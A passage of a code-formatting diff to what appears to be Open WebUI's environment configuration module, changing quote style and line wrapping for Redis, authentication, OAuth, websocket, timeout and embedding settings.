-ENABLE_QUERIES_CACHE = os.environ.get("ENABLE_QUERIES_CACHE", "False").lower() == "true" +ENABLE_QUERIES_CACHE = os.environ.get('ENABLE_QUERIES_CACHE', 'False').lower() == 'true' -RAG_SYSTEM_CONTEXT = os.environ.get("RAG_SYSTEM_CONTEXT", "False").lower() == "true" +RAG_SYSTEM_CONTEXT = os.environ.get('RAG_SYSTEM_CONTEXT', 'False').lower() == 'true' #################################### # REDIS #################################### -REDIS_URL = os.environ.get("REDIS_URL", "") -REDIS_CLUSTER = os.environ.get("REDIS_CLUSTER", "False").lower() == "true" +REDIS_URL = os.environ.get('REDIS_URL', '') +REDIS_CLUSTER = os.environ.get('REDIS_CLUSTER', 'False').lower() == 'true' -REDIS_KEY_PREFIX = os.environ.get("REDIS_KEY_PREFIX", "open-webui") +REDIS_KEY_PREFIX = os.environ.get('REDIS_KEY_PREFIX', 'open-webui') -REDIS_SENTINEL_HOSTS = os.environ.get("REDIS_SENTINEL_HOSTS", "") -REDIS_SENTINEL_PORT = os.environ.get("REDIS_SENTINEL_PORT", "26379") +REDIS_SENTINEL_HOSTS = os.environ.get('REDIS_SENTINEL_HOSTS', '') +REDIS_SENTINEL_PORT = os.environ.get('REDIS_SENTINEL_PORT', '26379') # Maximum number of retries for Redis operations when using Sentinel fail-over -REDIS_SENTINEL_MAX_RETRY_COUNT = os.environ.get("REDIS_SENTINEL_MAX_RETRY_COUNT", "2") +REDIS_SENTINEL_MAX_RETRY_COUNT = os.environ.get('REDIS_SENTINEL_MAX_RETRY_COUNT', '2') try: REDIS_SENTINEL_MAX_RETRY_COUNT = int(REDIS_SENTINEL_MAX_RETRY_COUNT) if REDIS_SENTINEL_MAX_RETRY_COUNT < 1: @@ -454,15 +419,15 @@ def parse_section(section): REDIS_SENTINEL_MAX_RETRY_COUNT = 2 -REDIS_SOCKET_CONNECT_TIMEOUT = os.environ.get("REDIS_SOCKET_CONNECT_TIMEOUT", "") +REDIS_SOCKET_CONNECT_TIMEOUT = os.environ.get('REDIS_SOCKET_CONNECT_TIMEOUT', '') try: REDIS_SOCKET_CONNECT_TIMEOUT = float(REDIS_SOCKET_CONNECT_TIMEOUT) except ValueError: REDIS_SOCKET_CONNECT_TIMEOUT = None -REDIS_RECONNECT_DELAY = os.environ.get("REDIS_RECONNECT_DELAY", "") +REDIS_RECONNECT_DELAY = os.environ.get('REDIS_RECONNECT_DELAY', '') -if REDIS_RECONNECT_DELAY == "": +if REDIS_RECONNECT_DELAY == '': REDIS_RECONNECT_DELAY = None else: try: @@ -477,192 +442,155 @@ def parse_section(section): #################################### # Number of uvicorn worker processes for handling requests -UVICORN_WORKERS = os.environ.get("UVICORN_WORKERS", "1") +UVICORN_WORKERS = os.environ.get('UVICORN_WORKERS', '1') try: UVICORN_WORKERS = int(UVICORN_WORKERS) if UVICORN_WORKERS < 1: UVICORN_WORKERS = 1 except ValueError: UVICORN_WORKERS = 1 - log.info(f"Invalid UVICORN_WORKERS value, defaulting to {UVICORN_WORKERS}") + log.info(f'Invalid UVICORN_WORKERS value, defaulting to {UVICORN_WORKERS}') #################################### # WEBUI_AUTH (Required for security) #################################### -WEBUI_AUTH = os.environ.get("WEBUI_AUTH", "True").lower() == "true" +WEBUI_AUTH = os.environ.get('WEBUI_AUTH', 'True').lower() == 'true' -ENABLE_INITIAL_ADMIN_SIGNUP = ( - os.environ.get("ENABLE_INITIAL_ADMIN_SIGNUP", "False").lower() == "true" -) -ENABLE_SIGNUP_PASSWORD_CONFIRMATION = ( - os.environ.get("ENABLE_SIGNUP_PASSWORD_CONFIRMATION", "False").lower() == "true" -) +ENABLE_INITIAL_ADMIN_SIGNUP = os.environ.get('ENABLE_INITIAL_ADMIN_SIGNUP', 'False').lower() == 'true' +ENABLE_SIGNUP_PASSWORD_CONFIRMATION = os.environ.get('ENABLE_SIGNUP_PASSWORD_CONFIRMATION', 'False').lower() == 'true' #################################### # Admin Account Runtime Creation #################################### # Optional env vars for creating an admin account on startup # Useful for headless/automated deployments -WEBUI_ADMIN_EMAIL = os.environ.get("WEBUI_ADMIN_EMAIL", "") -WEBUI_ADMIN_PASSWORD = os.environ.get("WEBUI_ADMIN_PASSWORD", "") -WEBUI_ADMIN_NAME = os.environ.get("WEBUI_ADMIN_NAME", "Admin") +WEBUI_ADMIN_EMAIL = os.environ.get('WEBUI_ADMIN_EMAIL', '') +WEBUI_ADMIN_PASSWORD = os.environ.get('WEBUI_ADMIN_PASSWORD', '') +WEBUI_ADMIN_NAME = os.environ.get('WEBUI_ADMIN_NAME', 'Admin') -WEBUI_AUTH_TRUSTED_EMAIL_HEADER = os.environ.get( - "WEBUI_AUTH_TRUSTED_EMAIL_HEADER", None -) -WEBUI_AUTH_TRUSTED_NAME_HEADER = os.environ.get("WEBUI_AUTH_TRUSTED_NAME_HEADER", None) -WEBUI_AUTH_TRUSTED_GROUPS_HEADER = os.environ.get( - "WEBUI_AUTH_TRUSTED_GROUPS_HEADER", None -) +WEBUI_AUTH_TRUSTED_EMAIL_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_EMAIL_HEADER', None) +WEBUI_AUTH_TRUSTED_NAME_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_NAME_HEADER', None) +WEBUI_AUTH_TRUSTED_GROUPS_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_GROUPS_HEADER', None) -ENABLE_PASSWORD_VALIDATION = ( - os.environ.get("ENABLE_PASSWORD_VALIDATION", "False").lower() == "true" -) +ENABLE_PASSWORD_VALIDATION = os.environ.get('ENABLE_PASSWORD_VALIDATION', 'False').lower() == 'true' PASSWORD_VALIDATION_REGEX_PATTERN = os.environ.get( - "PASSWORD_VALIDATION_REGEX_PATTERN", - r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$", + 'PASSWORD_VALIDATION_REGEX_PATTERN', + r'^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$', ) try: - PASSWORD_VALIDATION_REGEX_PATTERN = rf"{PASSWORD_VALIDATION_REGEX_PATTERN}" + PASSWORD_VALIDATION_REGEX_PATTERN = rf'{PASSWORD_VALIDATION_REGEX_PATTERN}' PASSWORD_VALIDATION_REGEX_PATTERN = re.compile(PASSWORD_VALIDATION_REGEX_PATTERN) except Exception as e: - log.error(f"Invalid PASSWORD_VALIDATION_REGEX_PATTERN: {e}") - PASSWORD_VALIDATION_REGEX_PATTERN = re.compile( - r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$" - ) + log.error(f'Invalid PASSWORD_VALIDATION_REGEX_PATTERN: {e}') + PASSWORD_VALIDATION_REGEX_PATTERN = re.compile(r'^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$') -PASSWORD_VALIDATION_HINT = os.environ.get("PASSWORD_VALIDATION_HINT", "") +PASSWORD_VALIDATION_HINT = os.environ.get('PASSWORD_VALIDATION_HINT', '') -BYPASS_MODEL_ACCESS_CONTROL = ( - os.environ.get("BYPASS_MODEL_ACCESS_CONTROL", "False").lower() == "true" -) +BYPASS_MODEL_ACCESS_CONTROL = os.environ.get('BYPASS_MODEL_ACCESS_CONTROL', 'False').lower() == 'true' -WEBUI_AUTH_SIGNOUT_REDIRECT_URL = os.environ.get( - "WEBUI_AUTH_SIGNOUT_REDIRECT_URL", None -) +WEBUI_AUTH_SIGNOUT_REDIRECT_URL = os.environ.get('WEBUI_AUTH_SIGNOUT_REDIRECT_URL', None) #################################### # WEBUI_SECRET_KEY #################################### WEBUI_SECRET_KEY = os.environ.get( - "WEBUI_SECRET_KEY", - os.environ.get( - "WEBUI_JWT_SECRET_KEY", "t0p-s3cr3t" - ), # DEPRECATED: remove at next major version + 'WEBUI_SECRET_KEY', + os.environ.get('WEBUI_JWT_SECRET_KEY', 't0p-s3cr3t'), # DEPRECATED: remove at next major version ) -WEBUI_SESSION_COOKIE_SAME_SITE = os.environ.get("WEBUI_SESSION_COOKIE_SAME_SITE", "lax") +WEBUI_SESSION_COOKIE_SAME_SITE = os.environ.get('WEBUI_SESSION_COOKIE_SAME_SITE', 'lax') -WEBUI_SESSION_COOKIE_SECURE = ( - os.environ.get("WEBUI_SESSION_COOKIE_SECURE", "false").lower() == "true" -) +WEBUI_SESSION_COOKIE_SECURE = os.environ.get('WEBUI_SESSION_COOKIE_SECURE', 'false').lower() == 'true' -WEBUI_AUTH_COOKIE_SAME_SITE = os.environ.get( - "WEBUI_AUTH_COOKIE_SAME_SITE", WEBUI_SESSION_COOKIE_SAME_SITE -) +WEBUI_AUTH_COOKIE_SAME_SITE = os.environ.get('WEBUI_AUTH_COOKIE_SAME_SITE', WEBUI_SESSION_COOKIE_SAME_SITE) WEBUI_AUTH_COOKIE_SECURE = ( os.environ.get( - "WEBUI_AUTH_COOKIE_SECURE", - os.environ.get("WEBUI_SESSION_COOKIE_SECURE", "false"), + 'WEBUI_AUTH_COOKIE_SECURE', + os.environ.get('WEBUI_SESSION_COOKIE_SECURE', 'false'), ).lower() - == "true" + == 'true' ) -if WEBUI_AUTH and WEBUI_SECRET_KEY == "": +if WEBUI_AUTH and WEBUI_SECRET_KEY == '': raise ValueError(ERROR_MESSAGES.ENV_VAR_NOT_FOUND) -ENABLE_COMPRESSION_MIDDLEWARE = ( - os.environ.get("ENABLE_COMPRESSION_MIDDLEWARE", "True").lower() == "true" -) +ENABLE_COMPRESSION_MIDDLEWARE = os.environ.get('ENABLE_COMPRESSION_MIDDLEWARE', 'True').lower() == 'true' #################################### # OAUTH Configuration #################################### -ENABLE_OAUTH_EMAIL_FALLBACK = ( - os.environ.get("ENABLE_OAUTH_EMAIL_FALLBACK", "False").lower() == "true" -) +ENABLE_OAUTH_EMAIL_FALLBACK = os.environ.get('ENABLE_OAUTH_EMAIL_FALLBACK', 'False').lower() == 'true' -ENABLE_OAUTH_ID_TOKEN_COOKIE = ( - os.environ.get("ENABLE_OAUTH_ID_TOKEN_COOKIE", "True").lower() == "true" -) +ENABLE_OAUTH_ID_TOKEN_COOKIE = os.environ.get('ENABLE_OAUTH_ID_TOKEN_COOKIE', 'True').lower() == 'true' -OAUTH_CLIENT_INFO_ENCRYPTION_KEY = os.environ.get( - "OAUTH_CLIENT_INFO_ENCRYPTION_KEY", WEBUI_SECRET_KEY -) +OAUTH_CLIENT_INFO_ENCRYPTION_KEY = os.environ.get('OAUTH_CLIENT_INFO_ENCRYPTION_KEY', WEBUI_SECRET_KEY) -OAUTH_SESSION_TOKEN_ENCRYPTION_KEY = os.environ.get( - "OAUTH_SESSION_TOKEN_ENCRYPTION_KEY", WEBUI_SECRET_KEY -) +OAUTH_SESSION_TOKEN_ENCRYPTION_KEY = os.environ.get('OAUTH_SESSION_TOKEN_ENCRYPTION_KEY', WEBUI_SECRET_KEY) # Maximum number of concurrent OAuth sessions per user per provider # This prevents unbounded session growth while allowing multi-device usage -OAUTH_MAX_SESSIONS_PER_USER = int(os.environ.get("OAUTH_MAX_SESSIONS_PER_USER", "10")) +OAUTH_MAX_SESSIONS_PER_USER = int(os.environ.get('OAUTH_MAX_SESSIONS_PER_USER', '10')) # Token Exchange Configuration # Allows external apps to exchange OAuth tokens for OpenWebUI tokens -ENABLE_OAUTH_TOKEN_EXCHANGE = ( - os.environ.get("ENABLE_OAUTH_TOKEN_EXCHANGE", "False").lower() == "true" -) +ENABLE_OAUTH_TOKEN_EXCHANGE = os.environ.get('ENABLE_OAUTH_TOKEN_EXCHANGE', 'False').lower() == 'true' #################################### # SCIM Configuration #################################### -ENABLE_SCIM = ( - os.environ.get("ENABLE_SCIM", os.environ.get("SCIM_ENABLED", "False")).lower() - == "true" -) -SCIM_TOKEN = os.environ.get("SCIM_TOKEN", "") -SCIM_AUTH_PROVIDER = os.environ.get("SCIM_AUTH_PROVIDER", "") +ENABLE_SCIM = os.environ.get('ENABLE_SCIM', os.environ.get('SCIM_ENABLED', 'False')).lower() == 'true' +SCIM_TOKEN = os.environ.get('SCIM_TOKEN', '') +SCIM_AUTH_PROVIDER = os.environ.get('SCIM_AUTH_PROVIDER', '') if ENABLE_SCIM and not SCIM_AUTH_PROVIDER: log.warning( - "SCIM is enabled but SCIM_AUTH_PROVIDER is not set. " + 'SCIM is enabled but SCIM_AUTH_PROVIDER is not set. ' "Set SCIM_AUTH_PROVIDER to the OAuth provider name (e.g. 'microsoft', 'oidc') " - "to enable externalId storage." + 'to enable externalId storage.' ) #################################### # LICENSE_KEY #################################### -LICENSE_KEY = os.environ.get("LICENSE_KEY", "") +LICENSE_KEY = os.environ.get('LICENSE_KEY', '') LICENSE_BLOB = None -LICENSE_BLOB_PATH = os.environ.get("LICENSE_BLOB_PATH", DATA_DIR / "l.data") +LICENSE_BLOB_PATH = os.environ.get('LICENSE_BLOB_PATH', DATA_DIR / 'l.data') if LICENSE_BLOB_PATH and os.path.exists(LICENSE_BLOB_PATH): - with open(LICENSE_BLOB_PATH, "rb") as f: + with open(LICENSE_BLOB_PATH, 'rb') as f: LICENSE_BLOB = f.read() -LICENSE_PUBLIC_KEY = os.environ.get("LICENSE_PUBLIC_KEY", "") +LICENSE_PUBLIC_KEY = os.environ.get('LICENSE_PUBLIC_KEY', '') pk = None if LICENSE_PUBLIC_KEY: - pk = serialization.load_pem_public_key(f""" + pk = serialization.load_pem_public_key( + f""" -----BEGIN PUBLIC KEY----- {LICENSE_PUBLIC_KEY} -----END PUBLIC KEY----- -""".encode("utf-8")) +""".encode('utf-8') + ) #################################### # MODELS #################################### -ENABLE_CUSTOM_MODEL_FALLBACK = ( - os.environ.get("ENABLE_CUSTOM_MODEL_FALLBACK", "False").lower() == "true" -) +ENABLE_CUSTOM_MODEL_FALLBACK = os.environ.get('ENABLE_CUSTOM_MODEL_FALLBACK', 'False').lower() == 'true' -MODELS_CACHE_TTL = os.environ.get("MODELS_CACHE_TTL", "1") -if MODELS_CACHE_TTL == "": +MODELS_CACHE_TTL = os.environ.get('MODELS_CACHE_TTL', '1') +if MODELS_CACHE_TTL == '': MODELS_CACHE_TTL = None else: try: @@ -676,30 +604,23 @@ def parse_section(section): #################################### ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION = ( - os.environ.get("ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION", "False").lower() - == "true" + os.environ.get('ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION', 'False').lower() == 'true' ) -CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = os.environ.get( - "CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE", "1" -) +CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = os.environ.get('CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE', '1') -if CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE == "": +if CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE == '': CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = 1 else: try: - CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = int( - CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE - ) + CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = int(CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE) except Exception: CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = 1 -CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = os.environ.get( - "CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES", "30" -) +CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = os.environ.get('CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES', '30') -if CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES == "": +if CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES == '': CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = 30 else: try: @@ -708,17 +629,13 @@ def parse_section(section): CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = 30 -CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = os.environ.get( - "CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE", "" -) +CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = os.environ.get('CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE', '') -if CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE == "": +if CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE == '': CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = None else: try: - CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = int( - CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE - ) + CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = int(CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE) except Exception: CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = None @@ -727,70 +644,62 @@ def parse_section(section): # WEBSOCKET SUPPORT #################################### -ENABLE_WEBSOCKET_SUPPORT = ( - os.environ.get("ENABLE_WEBSOCKET_SUPPORT", "True").lower() == "true" -) +ENABLE_WEBSOCKET_SUPPORT = os.environ.get('ENABLE_WEBSOCKET_SUPPORT', 'True').lower() == 'true' -WEBSOCKET_MANAGER = os.environ.get("WEBSOCKET_MANAGER", "") +WEBSOCKET_MANAGER = os.environ.get('WEBSOCKET_MANAGER', '') -WEBSOCKET_REDIS_OPTIONS = os.environ.get("WEBSOCKET_REDIS_OPTIONS", "") +WEBSOCKET_REDIS_OPTIONS = os.environ.get('WEBSOCKET_REDIS_OPTIONS', '') -if WEBSOCKET_REDIS_OPTIONS == "": +if WEBSOCKET_REDIS_OPTIONS == '': if REDIS_SOCKET_CONNECT_TIMEOUT: - WEBSOCKET_REDIS_OPTIONS = { - "socket_connect_timeout": REDIS_SOCKET_CONNECT_TIMEOUT - } + WEBSOCKET_REDIS_OPTIONS = {'socket_connect_timeout': REDIS_SOCKET_CONNECT_TIMEOUT} else: - log.debug("No WEBSOCKET_REDIS_OPTIONS provided, defaulting to None") + log.debug('No WEBSOCKET_REDIS_OPTIONS provided, defaulting to None') WEBSOCKET_REDIS_OPTIONS = None else: try: WEBSOCKET_REDIS_OPTIONS = json.loads(WEBSOCKET_REDIS_OPTIONS) except Exception: - log.warning("Invalid WEBSOCKET_REDIS_OPTIONS, defaulting to None") + log.warning('Invalid WEBSOCKET_REDIS_OPTIONS, defaulting to None') WEBSOCKET_REDIS_OPTIONS = None -WEBSOCKET_REDIS_URL = os.environ.get("WEBSOCKET_REDIS_URL", REDIS_URL) -WEBSOCKET_REDIS_CLUSTER = ( - os.environ.get("WEBSOCKET_REDIS_CLUSTER", str(REDIS_CLUSTER)).lower() == "true" -) +WEBSOCKET_REDIS_URL = os.environ.get('WEBSOCKET_REDIS_URL', REDIS_URL) +WEBSOCKET_REDIS_CLUSTER = os.environ.get('WEBSOCKET_REDIS_CLUSTER', str(REDIS_CLUSTER)).lower() == 'true' -websocket_redis_lock_timeout = os.environ.get("WEBSOCKET_REDIS_LOCK_TIMEOUT", "60") +websocket_redis_lock_timeout = os.environ.get('WEBSOCKET_REDIS_LOCK_TIMEOUT', '60') try: WEBSOCKET_REDIS_LOCK_TIMEOUT = int(websocket_redis_lock_timeout) except ValueError: WEBSOCKET_REDIS_LOCK_TIMEOUT = 60 -WEBSOCKET_SENTINEL_HOSTS = os.environ.get("WEBSOCKET_SENTINEL_HOSTS", "") -WEBSOCKET_SENTINEL_PORT = os.environ.get("WEBSOCKET_SENTINEL_PORT", "26379") -WEBSOCKET_SERVER_LOGGING = ( - os.environ.get("WEBSOCKET_SERVER_LOGGING", "False").lower() == "true" -) +WEBSOCKET_SENTINEL_HOSTS = os.environ.get('WEBSOCKET_SENTINEL_HOSTS', '') +WEBSOCKET_SENTINEL_PORT = os.environ.get('WEBSOCKET_SENTINEL_PORT', '26379') +WEBSOCKET_SERVER_LOGGING = os.environ.get('WEBSOCKET_SERVER_LOGGING', 'False').lower() == 'true' WEBSOCKET_SERVER_ENGINEIO_LOGGING = ( os.environ.get( - "WEBSOCKET_SERVER_ENGINEIO_LOGGING", - os.environ.get("WEBSOCKET_SERVER_LOGGING", "False"), + 'WEBSOCKET_SERVER_ENGINEIO_LOGGING', + os.environ.get('WEBSOCKET_SERVER_LOGGING', 'False'), ).lower() - == "true" + == 'true' ) -WEBSOCKET_SERVER_PING_TIMEOUT = os.environ.get("WEBSOCKET_SERVER_PING_TIMEOUT", "20") +WEBSOCKET_SERVER_PING_TIMEOUT = os.environ.get('WEBSOCKET_SERVER_PING_TIMEOUT', '20') try: WEBSOCKET_SERVER_PING_TIMEOUT = int(WEBSOCKET_SERVER_PING_TIMEOUT) except ValueError: WEBSOCKET_SERVER_PING_TIMEOUT = 20 -WEBSOCKET_SERVER_PING_INTERVAL = os.environ.get("WEBSOCKET_SERVER_PING_INTERVAL", "25") +WEBSOCKET_SERVER_PING_INTERVAL = os.environ.get('WEBSOCKET_SERVER_PING_INTERVAL', '25') try: WEBSOCKET_SERVER_PING_INTERVAL = int(WEBSOCKET_SERVER_PING_INTERVAL) except ValueError: WEBSOCKET_SERVER_PING_INTERVAL = 25 -WEBSOCKET_EVENT_CALLER_TIMEOUT = os.environ.get("WEBSOCKET_EVENT_CALLER_TIMEOUT", "") +WEBSOCKET_EVENT_CALLER_TIMEOUT = os.environ.get('WEBSOCKET_EVENT_CALLER_TIMEOUT', '') -if WEBSOCKET_EVENT_CALLER_TIMEOUT == "": +if WEBSOCKET_EVENT_CALLER_TIMEOUT == '': WEBSOCKET_EVENT_CALLER_TIMEOUT = None else: try: @@ -799,11 +708,11 @@ def parse_section(section): WEBSOCKET_EVENT_CALLER_TIMEOUT = 300 -REQUESTS_VERIFY = os.environ.get("REQUESTS_VERIFY", "True").lower() == "true" +REQUESTS_VERIFY = os.environ.get('REQUESTS_VERIFY', 'True').lower() == 'true' -AIOHTTP_CLIENT_TIMEOUT = os.environ.get("AIOHTTP_CLIENT_TIMEOUT", "") +AIOHTTP_CLIENT_TIMEOUT = os.environ.get('AIOHTTP_CLIENT_TIMEOUT', '') -if AIOHTTP_CLIENT_TIMEOUT == "": +if AIOHTTP_CLIENT_TIMEOUT == '': AIOHTTP_CLIENT_TIMEOUT = None else: try: @@ -812,16 +721,14 @@ def parse_section(section): AIOHTTP_CLIENT_TIMEOUT = 300 -AIOHTTP_CLIENT_SESSION_SSL = ( - os.environ.get("AIOHTTP_CLIENT_SESSION_SSL", "True").lower() == "true" -) +AIOHTTP_CLIENT_SESSION_SSL = os.environ.get('AIOHTTP_CLIENT_SESSION_SSL', 'True').lower() == 'true' AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = os.environ.get( - "AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST", - os.environ.get("AIOHTTP_CLIENT_TIMEOUT_OPENAI_MODEL_LIST", "10"), + 'AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST', + os.environ.get('AIOHTTP_CLIENT_TIMEOUT_OPENAI_MODEL_LIST', '10'), ) -if AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST == "": +if AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST == '': AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = None else: try: @@ -830,29 +737,25 @@ def parse_section(section): AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = 10 -AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = os.environ.get( - "AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA", "10" -) +AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = os.environ.get('AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA', '10') -if AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA == "": +if AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA == '': AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = None else: try: - AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = int( - AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA - ) + AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = int(AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA) except Exception: AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = 10 AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL = ( - os.environ.get("AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL", "True").lower() == "true" + os.environ.get('AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL', 'True').lower() == 'true' ) -RAG_EMBEDDING_TIMEOUT = os.environ.get("RAG_EMBEDDING_TIMEOUT", "") +RAG_EMBEDDING_TIMEOUT = os.environ.get('RAG_EMBEDDING_TIMEOUT', '') -if RAG_EMBEDDING_TIMEOUT == "": +if RAG_EMBEDDING_TIMEOUT == '': RAG_EMBEDDING_TIMEOUT = None else: try: @@ -866,210 +769,158 @@ def parse_section(section): #################################### -SENTENCE_TRANSFORMERS_BACKEND = os.environ.get("SENTENCE_TRANSFORMERS_BACKEND", "") -if SENTENCE_TRANSFORMERS_BACKEND == "": - SENTENCE_TRANSFORMERS_BACKEND = "torch" +SENTENCE_TRANSFORMERS_BACKEND = os.environ.get('SENTENCE_TRANSFORMERS_BACKEND', '') +if SENTENCE_TRANSFORMERS_BACKEND == '': + SENTENCE_TRANSFORMERS_BACKEND = 'torch' -SENTENCE_TRANSFORMERS_MODEL_KWARGS = os.environ.get( - "SENTENCE_TRANSFORMERS_MODEL_KWARGS", "" -) -if SENTENCE_TRANSFORMERS_MODEL_KWARGS == "": +SENTENCE_TRANSFORMERS_MODEL_KWARGS = os.environ.get('SENTENCE_TRANSFORMERS_MODEL_KWARGS', '') +if SENTENCE_TRANSFORMERS_MODEL_KWARGS == '': SENTENCE_TRANSFORMERS_MODEL_KWARGS = None else: try: - SENTENCE_TRANSFORMERS_MODEL_KWARGS = json.loads( - SENTENCE_TRANSFORMERS_MODEL_KWARGS - ) + SENTENCE_TRANSFORMERS_MODEL_KWARGS = json.loads(SENTENCE_TRANSFORMERS_MODEL_KWARGS) except Exception: SENTENCE_TRANSFORMERS_MODEL_KWARGS = None -SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND", "" -) -if SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND == "": - SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = "torch" +SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = os.environ.get('SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND', '') +if SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND == '': + SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = 'torch' SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS", "" + 'SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS', '' ) -if SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS == "": +if SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS == '': SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = None else: try: - SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = json.loads( - SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS - ) + SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = json.loads(SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS) except Exception: SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = None # Whether to apply sigmoid normalization to CrossEncoder reranking scores. # When enabled (default), scores are normalized to 0-1 range for proper # relevance threshold behavior with MS MARCO models. SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION = ( - os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION", "True" - ).lower() - == "true" + os.environ.get('SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION', 'True').lower() == 'true' ) #################################### # OFFLINE_MODE #################################### -ENABLE_VERSION_UPDATE_CHECK = ( - os.environ.get("ENABLE_VERSION_UPDATE_CHECK", "true").lower() == "true" -) -OFFLINE_MODE = os.environ.get("OFFLINE_MODE", "false").lower() == "true" +ENABLE_VERSION_UPDATE_CHECK = os.environ.get('ENABLE_VERSION_UPDATE_CHECK', 'true').lower() == 'true' +OFFLINE_MODE = os.environ.get('OFFLINE_MODE', 'false').lower() == 'true' if OFFLINE_MODE: - os.environ["HF_HUB_OFFLINE"] = "1" + os.environ['HF_HUB_OFFLINE'] = '1' ENABLE_VERSION_UPDATE_CHECK = False #################################### # AUDIT LOGGING #################################### -ENABLE_AUDIT_STDOUT = os.getenv("ENABLE_AUDIT_STDOUT", "False").lower() == "true" -ENABLE_AUDIT_LOGS_FILE = os.getenv("ENABLE_AUDIT_LOGS_FILE", "True").lower() == "true" +ENABLE_AUDIT_STDOUT = os.getenv('ENABLE_AUDIT_STDOUT', 'False').lower() == 'true' +ENABLE_AUDIT_LOGS_FILE = os.getenv('ENABLE_AUDIT_LOGS_FILE', 'True').lower() == 'true' # Where to store log file # Defaults to the DATA_DIR/audit.log. To set AUDIT_LOGS_FILE_PATH you need to # provide the whole 